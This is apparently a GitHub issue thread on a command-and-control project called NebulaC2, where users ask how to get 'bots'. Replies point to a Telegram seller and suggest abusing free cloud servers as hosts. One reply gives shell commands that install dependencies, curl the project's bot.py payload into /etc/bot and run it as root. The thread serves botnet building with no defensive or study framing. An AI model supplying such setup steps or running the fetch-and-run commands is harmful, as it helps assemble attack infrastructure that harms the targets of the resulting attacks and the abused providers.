### ISSUE TITLE
help me 

### ISSUE THREAD

**Issue by BUTTERFLYKKKKKKKK** [NixWasHere/NebulaC2#42]
how to get bots

**Comment by HenryEnrique** [comment]
Message https://t.me/Blackhathacker110 he gave me mine

**Comment by AdeebToPro** [comment]
you can try google terminal or vps you can get vps free from aws for 1 years but you have to to create after 750 because they have terminated after 31 day. and max instad is 20 pre user

**Comment by legit1337x** [comment]
sudo apt install python3 && sudo apt install python && yum install python3 && yum install python && pkg install python3 && pkg install python
pip install cloudscraper requests && pip3 install cloudscraper requests
cd /etc
mkdir bot
cd /etc/bot
curl https://github.com/NixWasHere/NebulaC2/edit/main/src/Payload/bot.py
sudo python3 bot.py

**Comment by Kanedidthat** [comment]
> you can try google terminal or vps you can get vps free from aws for 1 years but you have to to create after 750 because they have terminated after 31 day. and max instad is 20 pre user

how would i install the bot into google termnial?
